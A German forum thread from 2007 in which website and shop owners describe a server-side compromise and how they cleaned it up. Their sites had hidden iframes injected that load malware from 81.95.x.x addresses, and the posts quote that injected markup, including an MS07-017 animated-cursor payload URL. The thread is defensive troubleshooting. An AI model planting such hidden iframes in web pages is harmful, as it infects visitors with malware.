DJ-Team-2002 Posted June 1, 2007 Report Share Posted June 1, 2007 Hallo, wir haben ein Problem mit unserem Online-Shop und hoffen das uns hier jemand weiterhelfen kann. Unsere Site fängt mit einer Extra-Index Seite an und dort hat man dann die Auswahl wohin man möchte. Entweder zur Partysite (ist wo anders hinterlegt) oder zum Shop. Klickt man nun auf den Shop, so gehts auch normal dorthin....jedenfalls wird die Indexseite des Shops geladen und wenn sie fertig ist kommt unser Virenprogramm und hat einen Trojaner gefunden. Nach einen Blick in den Datenschutzbericht des Explorers stellt man fest, das anfangs nur Seiten des Shops geladen werden, jedoch zum Schluss noch 3 weitere fremde Seiten: - http://81.95.149.27/logo/index.php - http://81.95.149.28/go.php?sid=1 - http://81.95.149.28/try/index.php Von dort aus wird dann eine Datei auf C:/ abgespeichert welche "Gott sei Dank" von meinem AVG Anti-Virus erkannt und jedesmal gelöscht wird. Das ist jedoch auf jeden Fall nervig und absolut Kundenfeindlich. Nun habe ich mir schon einmal gedacht das es evtl. an irgend einem Bild liegt, hatte Sie alle gelöscht, jedoch ohne Erfolg. Ich hoffe jemand kann weiterhelfen, da ich absolut verzweifelt bin. Danke schon einmal im voraus. Achso ja, die Website ist http://www.DJTeam-2002.de Beste grüße Thomas Link to comment Share on other sites More sharing options...
jens_kaiser Posted June 5, 2007 Report Share Posted June 5, 2007 Wie ich sehe, hast du das gleiche Problem, wie ich auf dem server. Bei mir wird auch in jeder Indexdatei meiner domains dieses inlineframe geschrieben: <DEFANGED_iframe > src='http://81.95.149.27/logo/index.php' width='1' height='1' > style='visibility: hidden;'></iframe> Auch ich bin verzweifelt, meine Festplatte und das Betriebssystem sind sauber. Panda erkennt solche Trojaner und entfernt sie. Das Problem liegt als serverseitig. Wie hast du das Problem gelößt oder hast du es immer noch. Über eine Antwort wäre ich sehr dankbar, da der Support von 1und1.de das als Lapalie einfach abtun und sich nicht wirklich drum kümmern. Ich möchte nicht extra meine domains hier veröffentlichen, sonst klickt noch einer drauf, ich habe so schon genug Ärger am Hals. MfG Jens Kaiser Link to comment Share on other sites More sharing options...
wibros Posted June 5, 2007 Report Share Posted June 5, 2007 Hört sich auf jeden Fall nach einer Infektion am Server an. Wenn das ein Root-Server ist, solltest du wissen, was zu tun ist, um das loszuwerden. Ansonsten sollte 1&1 in die Puschen kommen... Link to comment Share on other sites More sharing options...
DJ-Team-2002 Posted June 5, 2007 Author Report Share Posted June 5, 2007 Sooooo juhu hab endlich meinen Shop wieder sauber.Also wie du schon richtig erkannt hast, hat sich aus was für Gründen auch immer jemand an dem Quelltext zu schaffen gemacht. Ich habe alle .php Dateien runterkopiert und sie mit Macromedia mir anzeigen lassen....dann habe ich bei 2 dateien am ende ebenfalls diesen netten Hidden-Frame gefunden und ihn gelöscht....die gesäuberte datei wieder hochkopiert und die alte dadurch ersetzt.....das wars....bis heute läuft eigentlich alles ganz easy Achso ja, bei mir war die index.php und die login.php betroffen Schon komisch das sich solch Zufälle ergeben.....habe ebenfalls nen hostingpaket bei 1&1.....die sagten mir natürlich auch das bei ihnen alle ok is.....aber wer will schon zugeben das er unsicher ist? Zumindest die kleinen Hilfsarbeiter da am Telefontischlein bekommen davon auch ncihts mit. beste Grüße Tom so mal schauen ob das weiterhilft.... Link to comment Share on other sites More sharing options...
franc Posted July 26, 2007 Report Share Posted July 26, 2007 hallo, auch auf unserm server war plötzlich dieser virus. es ist der 'ms07-017' der nützt auf windows systemen einen bug seit dez.06 (erst im april 07 mit update bugfixed) sog. ani-lücke, hat was mit cursor zu tun, im schadcode steht dann: ... style=\"CURSOR: url('http://81.95.149.27/eur/ms07-017.ani' ... und den schadcode holt sich der virus von russischen servern die mit 81.95. anfangen. in meinem fall war jeweils in den dateien admin\index.php cache\index.html export\index.html index.php login.php templates_c\index.html <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> angehängt. antivir hat das bemängelt, wenn man die seite im IE öffnete (nicht betroffen der FF). War etwas umständlich den zu finden, weil er sich ja erst bei seitenaufruf lädt und durch einfaches durchsuchen nach ms17-17 nicht zu finden ist (wohl aber durch textsuche nach 81.95.). wie diese dateien veraendert werden konnten ist mir noch nicht klar, die ftp-logfiles muessen noch geprueft werden (sofern vorhanden, kein direkter serverzugriff). vielleicht ja aber durch eine luecke in xtcommerce oder php??? wenn ich mehr weiss werde ich es hier posten. gruss franc Link to comment Share on other sites More sharing options...
Doctor Dom Posted October 8, 2007 Report Share Posted October 8, 2007 81.95. usw...ist übrigens in Panama, nicht immer nur die bösen Russen... ;-) Link to comment Share on other sites More sharing options...
xaex Posted October 8, 2007 Report Share Posted October 8, 2007 es sind immer entweder die bullen oder die russen.. dumm ist nur wenn man bulle und gleichzeitig russe ist.. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.